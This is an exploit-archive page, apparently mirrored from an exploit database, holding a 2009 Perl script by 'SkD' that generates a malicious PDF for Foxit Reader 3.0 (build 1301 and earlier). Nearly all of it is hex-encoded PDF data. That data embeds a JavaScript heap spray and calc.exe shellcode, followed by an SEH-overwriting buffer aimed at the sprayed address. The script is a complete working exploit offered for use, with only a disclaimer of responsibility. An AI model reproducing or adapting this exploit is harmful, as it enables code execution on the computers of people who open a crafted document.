[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit (Univ.)
# Published : 2009-03-13
# Author : SkD
# Previous Title : Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit (multi target)
# Next Title : VUPlayer <= 2.49 .cue File Universal Buffer Overflow Exploit
#!/usr/bin/perl
#
# Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit (Universal)
# ------------------------------------------------------------------------
# Exploit by SkD (skdrat@hotmail.com)
#
# A SEH overflow occurs in this vulnerability in the popular
# Foxit Reader. The latest build (1506) is not affected but
# previous are. SafeSEH is a bitch in this one, but nothing
# is impossible :).
#
# UPDATE: I have implemented Heap Spraying by JavaScript to
# make it universal :). The current shellcode is to execute
# calc.exe.
#
# Exploit written for Windows XP SP3 (should work on other
# versions).
#
# Credits to CORE Sec.
#
# Note: Author is not responsible for any damage done with this.
use strict;
use warnings;
my $pdf_data1 = "x25x50x44x46x2Dx31x2Ex34x0Dx0Ax25xA1xB3xC5xD7x0Dx0Ax31x20x30x20x6F".
"x62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx50x61x67x65x2Fx50x61x72x65x6E".
"x74x20x34x20x30x20x52x20x2Fx52x65x73x6Fx75x72x63x65x73x20x36x20x30".
"x20x52x20x2Fx4Dx65x64x69x61x42x6Fx78x5Bx20x30x20x30x20x35x39x35x20".
"x38x34x32x5Dx2Fx47x72x6Fx75x70x3Cx3Cx2Fx53x2Fx54x72x61x6Ex73x70x61".
"x72x65x6Ex63x79x2Fx43x53x2Fx44x65x76x69x63x65x52x47x42x2Fx49x20x74".
"x72x75x65x3Ex3Ex2Fx43x6Fx6Ex74x65x6Ex74x73x20x32x20x30x20x52x20x2F".
"x41x6Ex6Ex6Fx74x73x5Bx20x32x34x20x30x20x52x20x20x32x35x20x30x20x52".
"x20x20x39x20x30x20x52x20x5Dx3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32".
"x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Cx65x6Ex67x74x68x20x33x20x30x20".
"x52x20x2Fx46x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44x65x63x6Fx64x65x3E".
"x3Ex73x74x72x65x61x6Dx0Dx0Ax78x9Cx33xD0x33x54x28xE7x2Ax54x30x50x30".
"x00xB2x4Cx2Dx4DxF5x8Cx15x2Cx4Cx0CxF5x2Cx15x8Ax52x15xC2xB5x14xF2xB8".
"x02x15x00x87xEBx07x8Ax0Dx0Ax65x6Ex64x73x74x72x65x61x6Dx0Dx0Ax65x6E".
"x64x6Fx62x6Ax0Dx0Ax33x20x30x20x6Fx62x6Ax0Dx0Ax20x34x32x0Dx0Ax65x6E".
"x64x6Fx62x6Ax0Dx0Ax34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65".
"x2Fx50x61x67x65x73x2Fx52x65x73x6Fx75x72x63x65x73x20x36x20x30x20x52".
"x20x2Fx4Dx65x64x69x61x42x6Fx78x5Bx20x30x20x30x20x35x39x35x20x38x34".
"x32x5Dx2Fx4Bx69x64x73x5Bx20x31x20x30x20x52x20x5Dx2Fx43x6Fx75x6Ex74".
"x20x31x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax35x20x30x20x6Fx62x6Ax0D".
"x0Ax3Cx3Cx2Fx5Ax69x54x69x20x31x38x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6E".
"x64x6Fx62x6Ax0Dx0Ax36x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx46x6Fx6Ex74".
"x20x35x20x30x20x52x20x2Fx50x72x6Fx63x53x65x74x5Bx2Fx50x44x46x2Fx54".
"x65x78x74x5Dx3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax37x20x30x20x6Fx62".
"x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx43x61x74x61x6Cx6Fx67x2Fx50x61x67".
"x65x73x20x34x20x30x20x52x20x2Fx4Fx70x65x6Ex41x63x74x69x6Fx6Ex5Bx20".
"x31x20x30x20x52x20x2Fx58x59x5Ax20x6Ex75x6Cx6Cx20x6Ex75x6Cx6Cx20x30".
"x5Dx2Fx4Cx61x6Ex67x28x65x6Ex2Dx55x53x29x2Fx4Ex61x6Dx65x73x20x32x38".
"x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax38x20x30x20x6F".
"x62x6Ax0Dx0Ax3Cx3Cx2Fx41x75x74x68x6Fx72x28xFExFFx00x6Dx00x61x00x72".
"x00x63x00x69x00x61x00x6Ex00x6Fx29x2Fx43x72x65x61x74x6Fx72x28xFExFF".
"x00x57x00x72x00x69x00x74x00x65x00x72x29x2Fx50x72x6Fx64x75x63x65x72".
"x28xFExFFx00x4Fx00x70x00x65x00x6Ex00x4Fx00x66x00x66x00x69x00x63x00".
"x65x00x2Ex00x6Fx00x72x00x67x00x20x00x33x00x2Ex00x30x29x2Fx43x72x65".
"x61x74x69x6Fx6Ex44x61x74x65x28x44x3Ax32x30x30x39x30x32x31x39x31x34".
"x34x35x34x39x2Dx30x32x27x30x30x27x29x2Fx4Dx6Fx64x44x61x74x65x28x44".
"x3Ax32x30x30x39x30x33x31x32x32x32x30x32x34x33x2Dx30x38x27x30x30x27".
"x29x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax39x20x30x20x6Fx62x6Ax0Dx0A".
"x3Cx3Cx2Fx54x79x70x65x2Fx41x6Ex6Ex6Fx74x2Fx53x75x62x74x79x70x65x2F".
"x53x63x72x65x65x6Ex2Fx50x20x31x20x30x20x52x20x2Fx4Dx28x44x3Ax32x30".
"x30x39x30x32x31x39x31x34x34x37x35x36x2Dx30x32x27x30x30x27x29x2Fx46".
"x20x34x2Fx52x65x63x74x5Bx20x32x30x35x2Ex31x35x33x20x38x30x36x2Ex31".
"x38x32x20x33x33x35x2Ex32x39x31x20x38x33x33x2Ex34x37x32x5Dx2Fx42x53".
"x3Cx3Cx2Fx53x2Fx53x2Fx57x20x31x3Ex3Ex2Fx42x45x3Cx3Cx2Fx53x2Fx53x3E".
"x3Ex2Fx4Dx4Bx3Cx3Cx2Fx42x43x5Bx20x30x20x30x20x31x5Dx2Fx52x20x30x2F".
"x49x46x3Cx3Cx2Fx53x57x2Fx41x2Fx53x2Fx41x2Fx46x42x20x66x61x6Cx73x65".
"x2Fx41x5Bx20x30x2Ex35x20x30x2Ex35x5Dx3Ex3Ex3Ex3Ex2Fx41x50x3Cx3Cx2F".
"x4Ex20x31x30x20x30x20x52x20x3Ex3Ex2Fx54x28x63x75x61x6Cx71x75x69x65".
"x72x61x29x2Fx41x20x31x32x20x30x20x52x20x2Fx41x41x20x31x37x20x30x20".
"x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x30x20x30x20x6Fx62x6A".
"x0Dx0Ax3Cx3Cx2Fx4Dx61x74x72x69x78x5Bx20x31x20x30x20x30x20x31x20x30".
"x20x30x5Dx2Fx42x42x6Fx78x5Bx20x30x20x30x20x31x33x30x2Ex31x33x39x20".
"x32x37x2Ex32x38x39x37x5Dx2Fx52x65x73x6Fx75x72x63x65x73x3Cx3Cx2Fx45".
"x78x74x47x53x74x61x74x65x3Cx3Cx2Fx49x6Dx61x67x65x4Fx70x61x63x69x74".
"x79x20x31x31x20x30x20x52x20x3Ex3Ex3Ex3Ex2Fx4Cx65x6Ex67x74x68x20x35".
"x34x2Fx46x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44x65x63x6Fx64x65x3Ex3E".
"x73x74x72x65x61x6Dx0Dx0Ax78x9Cx2BxE4x2AxE4x32x50x00xC1xA2x74x30xC3".
"xD0xD8x40xCFxD0xD8x52xC1xC8x5CxCFxC8xC2xD2x5CxA1x28x95xCBx50x01x08".
"x8Dx2Cx20xC2xA6x70xE1x34x2DxAEx40x20x04x00xBDx52x0Dx43x0Dx0Ax65x6E".
"x64x73x74x72x65x61x6Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x31x20x30x20".
"x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx45x78x74x47x53x74x61x74x65".
"x2Fx43x41x20x31x2Fx63x61x20x31x2Fx41x49x53x20x66x61x6Cx73x65x3Ex3E".
"x0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x32x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3C".
"x2Fx54x79x70x65x2Fx41x63x74x69x6Fx6Ex2Fx53x2Fx52x65x6Ex64x69x74x69".
"x6Fx6Ex2Fx4Fx50x20x34x2Fx41x4Ex20x39x20x30x20x52x20x2Fx52x20x31x33".
"x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x33x20x30x20".
"x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx53x2Fx4Dx52x2Fx43x20x31x34x20x30x20x52x20".
"x2Fx4Ex28x63x75x61x6Cx71x75x69x65x72x61x29x3Ex3Ex0Dx0Ax65x6Ex64x6F".
"x62x6Ax0Dx0Ax31x34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx53x2Fx4Dx43x44".
"x2Fx43x54x28x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx66x75x74x75x72x65".
"x73x70x6Cx61x73x68x29x2Fx50x3Cx3Cx2Fx54x46x28x54x45x4Dx50x41x43x43".
"x45x53x53x29x3Ex3Ex2Fx44x20x31x35x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6E".
"x64x6Fx62x6Ax0Dx0Ax31x35x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70".
"x65x2Fx46x69x6Cx65x73x70x65x63x2Fx46x28x63x75x61x6Cx71x75x69x65x72".
"x61x29x2Fx46x53x2Fx55x52x4Cx3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31".
"x36x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x63x74x69x6F".
"x6Ex2Fx53x2Fx4Cx61x75x6Ex63x68x2Fx46x3Cx3Cx2Fx46x28x2Fx43x2F";
my $pdf_data2 = "x29x3Ex3Ex2Fx4Ex65x77x57x69x6Ex64x6Fx77x20x74x72x75x65x3Ex3Ex0Dx0A".
"x65x6Ex64x6Fx62x6Ax0Dx0Ax31x37x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx50".
"x56x20x31x36x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31".
"x38x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx46x6Fx6Ex74x2F".
"x53x75x62x74x79x70x65x2Fx54x79x70x65x31x2Fx42x61x73x65x46x6Fx6Ex74".
"x2Fx48x65x6Cx76x65x74x69x63x61x2Fx45x6Ex63x6Fx64x69x6Ex67x2Fx57x69".
"x6Ex41x6Ex73x69x45x6Ex63x6Fx64x69x6Ex67x2Fx46x78x54x61x67x20x31x3E".
"x3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x39x20x30x20x6Fx62x6Ax0Dx0Ax3C".
"x3Cx2Fx4Ex20x32x30x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0D".
"x0Ax32x30x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Cx65x6Ex67x74x68x20x31".
"x36x38x2Fx53x75x62x74x79x70x65x2Fx46x6Fx72x6Dx2Fx42x42x6Fx78x5Bx20".
"x32x38x35x20x37x39x34x20x35x34x31x20x38x32x37x5Dx2Fx52x65x73x6Fx75".
"x72x63x65x73x20x32x31x20x30x20x52x20x2Fx46x69x6Cx74x65x72x2Fx46x6C".
"x61x74x65x44x65x63x6Fx64x65x3Ex3Ex73x74x72x65x61x6Dx0Dx0Ax78x9Cx95".
"x8DxCDx0Ex82x30x10x84xEFx7Dx8Ax3Dx42xA2xD8x16x88x78x15xE1x66x4CxB4".
"x2Fx50x43xC1x1AxE8x92xA6xFExF4xEDx25x24x28x89x27xF6x30x99x99x6CxBE".
"xD9x0BxB2x39xFAx12x8Dx03xC6x40xD4x84x45x74x3CxA0x7FxC6x36x84xC1x90".
"x81x01xCFxD2xA9xDDxEEx92xC9x8Ax8Ex7Cx9Fx79x12xC5x9Cx51x3Ax40x0Fx24".
"x28x2AxEDx54x05x57x0Fx25xBExB5x83xB3x92x95xB2x21x88xFBx02x24x8BxE7".
"xC8x1Cx7Bx6Fx75x73x73x41x1ExFExC0x17xACxDDx4Bx5Ax05x39x76xBDx34x7E".
"xC5x29x4DxD7x83x64x0BxC7xF8x7CxABx44x0BxC5x53xB6x0FxE9x34x1Ax38x99".
"xD6x47x23xAFx10xE4x03x4Ax14x4Cx32x0Dx0Ax65x6Ex64x73x74x72x65x61x6D".
"x0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x31x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3C".
"x2Fx46x6Fx6Ex74x20x32x32x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62".
"x6Ax0Dx0Ax32x32x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Dx79x46x6Fx6Ex74".
"x20x31x38x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x33".
"x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x65x78x74x4Dx61x74x72x69x78x5B".
"x20x31x20x30x20x30x20x31x20x32x38x35x20x38x31x30x2Ex35x5Dx2Fx4Cx69".
"x63x65x6Ex73x65x28x45x76x61x6Cx75x61x74x69x6Fx6Ex29x2Fx4Dx65x6Ex64".
"x65x72x46x6Cx61x67x28x45x76x61x6Cx75x61x74x69x6Fx6Ex2Cx41x4Ex4Ex4F".
"x54x29x2Fx46x6Fx6Ex74x4Ex61x6Dx65x28x48x65x6Cx76x65x74x69x63x61x29".
"x2Fx46x6Fx6Ex74x53x69x7Ax65x20x31x31x2Fx54x65x78x74x28x45x64x69x74".
"x65x64x20x62x79x20x46x6Fx78x69x74x20x52x65x61x64x65x72x5Cx72x43x6F".
"x70x79x72x69x67x68x74x5Cx28x43x5Cx29x20x62x79x20x46x6Fx78x69x74x20".
"x53x6Fx66x74x77x61x72x65x20x43x6Fx6Dx70x61x6Ex79x2Cx32x30x30x35x2D".
"x32x30x30x38x5Cx72x46x6Fx72x20x45x76x61x6Cx75x61x74x69x6Fx6Ex20x4F".
"x6Ex6Cx79x2Ex5Cx72x29x2Fx43x68x61x72x43x6Fx6Cx6Fx72x20x32x35x35x2F".
"x43x68x61x72x53x70x61x63x65x20x30x2Fx4Cx69x6Ex65x46x65x65x64x20x30".
"x2Fx48x6Fx72x7Ax53x63x61x6Cx65x20x31x30x30x2Fx4Fx72x69x67x69x6Ex58".
"x20x32x38x35x2Fx4Fx72x69x67x69x6Ex59x20x38x31x36x2Fx62x43x68x61x6E".
"x67x65x42x6Fx78x20x30x2Fx42x6Fx78x57x69x64x74x68x20x32x35x36x3Ex3E".
"x0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3C".
"x2Fx53x75x62x74x79x70x65x2Fx46x72x65x65x54x65x78x74x2Fx52x65x63x74".
"x5Bx20x32x38x35x20x37x39x34x20x35x34x31x20x38x32x37x5Dx2Fx46x20x34".
"x2Fx41x50x20x31x39x20x30x20x52x20x2Fx46x6Fx78x69x74x54x61x67x20x32".
"x33x20x30x20x52x20x2Fx50x20x31x20x30x20x52x20x2Fx50x6Fx70x75x70x20".
"x32x35x20x30x20x52x20x2Fx46x4Ex28x48x65x6Cx76x65x74x69x63x61x29x2F".
"x43x6Fx6Ex74x65x6Ex74x73x28x45x64x69x74x65x64x20x62x79x20x46x6Fx78".
"x69x74x20x52x65x61x64x65x72x5Cx72x43x6Fx70x79x72x69x67x68x74x5Cx28".
"x43x5Cx29x20x62x79x20x46x6Fx78x69x74x20x53x6Fx66x74x77x61x72x65x20".
"x43x6Fx6Dx70x61x6Ex79x2Cx32x30x30x35x2Dx32x30x30x38x5Cx72x46x6Fx72".
"x20x45x76x61x6Cx75x61x74x69x6Fx6Ex20x4Fx6Ex6Cx79x2Ex5Cx72x29x2Fx42".
"x4Bx43x20x36x35x35x33x35x2Fx51x20x30x2Fx44x41x28x2Fx5Ax69x54x69x20".
"x31x31x20x54x66x20x31x20x30x20x30x20x72x67x20x31x20x30x20x30x20x31".
"x20x32x38x35x20x38x31x30x2Ex35x20x54x6Dx20x30x20x54x63x20x31x30x30".
"x20x54x7Ax29x2Fx49x54x2Fx46x72x65x65x54x65x78x74x54x79x70x65x77x72".
"x69x74x65x72x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x35x20x30x20x6F".
"x62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x6Ex6Ex6Fx74x2Fx53x75x62x74".
"x79x70x65x2Fx50x6Fx70x75x70x2Fx50x20x31x20x30x20x52x20x2Fx4Dx28x44".
"x3Ax32x30x30x39x30x32x31x39x31x34x34x38x31x35x2Dx30x32x27x30x30x27".
"x29x2Fx46x20x32x38x2Fx52x65x63x74x5Bx20x30x20x30x20x30x20x30x5Dx2F".
"x4Fx70x65x6Ex20x66x61x6Cx73x65x2Fx50x61x72x65x6Ex74x20x32x34x20x30".
"x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax33x30x20x30x20x6Fx62".
"x6Ax0Dx0Ax5Bx28x53x6Bx44x53x63x72x69x70x74x29x20x32x36x20x30x20x52".
"x5Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x39x20x30x20x6Fx62x6Ax0Dx0Ax3C".
"x3Cx2Fx4Ex61x6Dx65x73x20x33x30x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64".
"x6Fx62x6Ax0Dx0Ax32x38x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Ax61x76x61".
"x53x63x72x69x70x74x20x32x39x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6F".
"x62x6Ax0Dx0Ax32x37x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Cx65x6Ex67x74".
"x68x20x37x39x36x2Fx46x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44x65x63x6F".
"x64x65x3Ex3Ex73x74x72x65x61x6Dx0Dx0Ax78x9Cx7Dx54x5Dx8FxDAx30x10x7C".
"x47xE2x3Fx44x48x48x20x7Ax95x13xAFx77x13x71x54xAAxFAx33xAAx3Ex24xC1".
"xB9x8BxCAx01x82xE3xAExEDxAFxEFxEExA4x31x5CxBFx78xB0x8CxBDxB3x3Bx3B".
"x3BxCEx4Bx7DxCAx8ExF5xF7xDDxA1xDEx66x9BxECxB2x8FxE7xB6x3ExC6xC5x6C".
"x7Ex71x3Ex36xF3x4Bx6Cx42xA5x6BxE9xC2xFCxD2x75x5Dx89xB5x9Bx5FxA8xA2".
"xEAx76x9Dx65xABxE9x64x86x7DxF9xE7xEDxDBx35xD4x21xD7xBDxE7x7Ax44x79".
"x17x14xE5x73x2AxF4xBCx08x6Ex7ExE1x86x2Cx66x3CxF1xB6x7AxDDxFBx82xF2".
"x54x2Bx1Fx62xBCxC6x87xD2xF6xBEx34x2Cx15x40x95x12x2Cx0Fx5BxDDx2DxB5".
"x23x8AxBDxD7x5Ax12x84x34xDExA3x96x58x06x6Ax45x57xF1xA4x5Dx07x01x36".
"xDExA2x58xCFx29x50x6BxFBx10x0Cx6Bx9Dx86xD2x6Bx5Dx6Ex59x35x11x67x58".
"x11xEAx12x2AxB2xD5x02x56x72x8BxE1x60xB5x18x0Ax48x61xF1x14x8DxA1x67".
"x6Ex52x5Fx31x90xD5x42xC5x41x2BxA6x68xBDx60xDFx09xD8x1Ax4AxF3x27x86".
"xA1x62xB2x5AxD6x51xF0x44xE0x26x7Ax52x9Bx32x81xB8x06xE7xADx9Ex28xE7".
"x54xABx34xADxA4x06x43xB1xBAx01xACx98xA1x0Fx59x1Ex2Ex90xADx0AxE1xDA".
"x97xE9x43xB9xA1x3Cx53x07x65x68xECx2Bx40x43x6Ax03x83x79xEAx4Bx0Ax6E".
"xC1xBCx19x63xBCx40x13x6FxE7x5Cx9Bx92x14xA1x61xB8xAAxC1xADx69xAExE9".
"x1BxB0xB5x98x2Dx32xE4xE6xCCx90xDBxADx27x6Fx8AxD5x44x57x47xB1x7Ax86".
"x3Bx4CxA7xC0x7CxA3x31x14x70x0Ex04x9Fx34x02xA7xF9xD4x57x70xD0x96xA5".
"xC4x4Cx31x6BxD4xA5x41x73xABx45x60xE2x75x8Ex57x35xE0x8AxD6xB4xE5x1C".
"xFEx09xC8x50x9BxABx79x60x1ExCDxF9xEAxC6x9BxBExE0x5Bx91xB4xD2xB0x0E".
"x3Ex84x97x48xE0x9FxFCxEAx43xADx6Ex8Ax35x92x63x9Ax6Cx93x42x2Fx9Dx67".
"x60xE1x0Ax73x38x75xECx93xF2x78x23xAAx89xE5xCCxE1x90x72xE8x51x06xB7".
"xD4xA6xA4xC7x8BxB8xBAx57x7Dx68xAFxB2x42xE4x96xA3x29x13x6AxEBx11xFB".
"x86xD4x5Dx5Cx81x8Fx17x49xA8x60xAFxD5x7BxF3xDBx30x71x7DxDDx62xDAxC2".
"xB1x85x61xB5x3Bx78x95xBBx9BxB7x2Cx70x94xB7x48xE8x5Cx88xE5x19xA6x3C".
"x4Cx13x6Fx56xDCxCDxBCx88xB7x38x1Fx2Ax16xE8xB1x1DxF3x88x13xB8x11x73".
"xD4x87x97xBCx91xDBx6Bx12x32x0Fx6Bx36x53x58xD8xFCxECxC5xCDx96xEBx6C".
"x3Ax79xD1xAFxE2xFEx70xCCx36xB3xD9x7Ax3AxE9x0ExA7x6CxD1x7FxDAx3Fx6F".
"xF2xA2x5CxDBxE6xC3xC6xADxEFxEEx6CxB7x44xDCxEAxEDxA7xB3x72x95xFBxD7".
"xAAx05xA6x93xC7x58x1Fx9BxDDxA1xFDxAAxDFx5CxE0xC7x6FxB0xDEx35xFDxC3".
"x78xF5xF7x9Cx63x86x6Dx3Cx9DxFBx1Fx51xE3x0AxA7x27xE7xE3xA9xFExAEx7F".
"xAEx37xABx54xE6xFDx2ExEEx1Fx9Ex1FxA7x93xD7xC7x7Ex17xB3xC5x58xE3xD7".
"xF9x3DxB0xCBx6Cx3Cx5Ex6DxC6x9Dx75xDFxEFx76x23xA1x84x3Bx5Fx9AxF3xF3".
"xA9xDFx3Fx2CxDCxBBx6Cx40x1BxF5xFFx86xFDx56xF4x2ExC1x40x6Ax71x7BxB7".
"x1Ax9AxB9xCFxDCx37x72xFAx53x6Ax63x6AxF0x1BxD6xC4x4Cx73x3CxC5x27xD3".
"x32xBEx66x1Fx4Fx0Ax5Dx2CxD3xDCx74x54xFDx7DxAEx69xD6xFDx6AxB5xCCx34".
"xF0x73xFFx65xCCxA4xCAx27x91x14xF1x13xE7x6DxDBx93x0Dx0Ax65x6Ex64x73".
"x74x72x65x61x6Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x36x20x30x20x6Fx62".
"x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x63x74x69x6Fx6Ex2Fx53x2Fx4Ax61".
"x76x61x53x63x72x69x70x74x2Fx4Ax53x20x32x37x20x30x20x52x20x3Ex3Ex0D".
"x0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax78x72x65x66x0Dx0Ax30x20x33x31x0Dx0Ax30".
"x30x30x30x30x30x30x30x30x30x20x36x35x35x33x36x20x66x0Dx0Ax30x30x30".
"x30x30x30x30x30x31x37x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30".
"x30x30x31x39x37x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30".
"x33x31x34x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x33x33".
"x36x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x34x33x32x20".
"x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x34x36x38x20x30x30".
"x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x35x32x32x20x30x30x30x30".
"x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x36x33x33x20x30x30x30x30x30x20".
"x6Ex0Dx0Ax30x30x30x30x30x30x30x38x32x37x20x30x30x30x30x30x20x6Ex0D".
"x0Ax30x30x30x30x30x30x31x30x39x32x20x30x30x30x30x30x20x6Ex0Dx0Ax30".
"x30x30x30x30x30x31x33x31x35x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30".
"x30x30x30x31x33x37x34x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30".
"x30x31x34x34x37x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31".
"x35x30x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x35x39".
"x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x36x34x39x20".
"x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x37x31x37x31x20x30x30".
"x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x37x32x30x36x20x30x30x30x30".
"x30x20x6Ex0Dx0Ax30x30x30x30x30x30x37x33x30x36x20x30x30x30x30x30x20".
"x6Ex0Dx0Ax30x30x30x30x30x30x37x33x34x30x20x30x30x30x30x30x20x6Ex0D".
"x0Ax30x30x30x30x30x30x37x36x33x35x20x30x30x30x30x30x20x6Ex0Dx0Ax30".
"x30x30x30x30x30x37x36x37x32x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30".
"x30x30x30x37x37x31x31x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30".
"x30x38x30x35x33x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x38".
"x33x38x39x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x39x35x31".
"x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x38x36x34x31x20".
"x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x38x35x39x38x20x30x30".
"x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x38x35x36x30x20x30x30x30x30".
"x30x20x6Ex0Dx0Ax30x30x30x30x30x30x38x35x32x30x20x30x30x30x30x30x20".
"x6Ex0Dx0Ax74x72x61x69x6Cx65x72x0Dx0Ax3Cx3Cx2Fx52x6Fx6Fx74x20x37x20".
"x30x20x52x20x2Fx49x6Ex66x6Fx20x38x20x30x20x52x20x2Fx49x44x5Bx28xDF".
"xB0x2BxECxF3x6BxFAx01x9CxBCx4Bx06x11x7Cx78x79x29x28xDFxB0x2BxECxF3".
"x6BxFAx01x9CxBCx4Bx06x11x7Cx78x79x29x5Dx2Fx44x6Fx63x43x68x65x63x6B".
"x73x75x6Dx2Fx37x36x33x36x30x32x39x46x42x32x42x32x46x44x32x39x42x43".
"x33x34x41x42x43x33x32x43x46x34x35x42x38x46x2Fx53x69x7Ax65x20x33x31".
"x3Ex3Ex0Dx0Ax73x74x61x72x74x78x72x65x66x0Dx0Ax39x35x37x30x0Dx0Ax25".
"x25x45x4Fx46x0Dx0A";
#Now you cannot modify the shellcode in this Perl script but in the PDF's JavaScript.
#The set shellcode is calc.exe shellcode (alpha2).
my $overflow1 = "x41" x 1346;
my $overflow2 = "x41" x 4096;
my $sehjmp = "SkD"; # ;)
my $sehret = "x30x30x30x30"; # 0x30303030 - heap sprayed block
open (my $pdf, "> s.pdf");
binmode $pdf;
print $pdf $pdf_data1.
$overflow1.$sehjmp.$sehret.$overflow2.
$pdf_data2;
close $pdf;
# www.Syue.com [2009-03-13]